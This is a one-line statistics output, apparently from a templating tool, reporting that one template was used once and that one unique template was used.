Number of times templates used: 1 Number of unique templates used: 1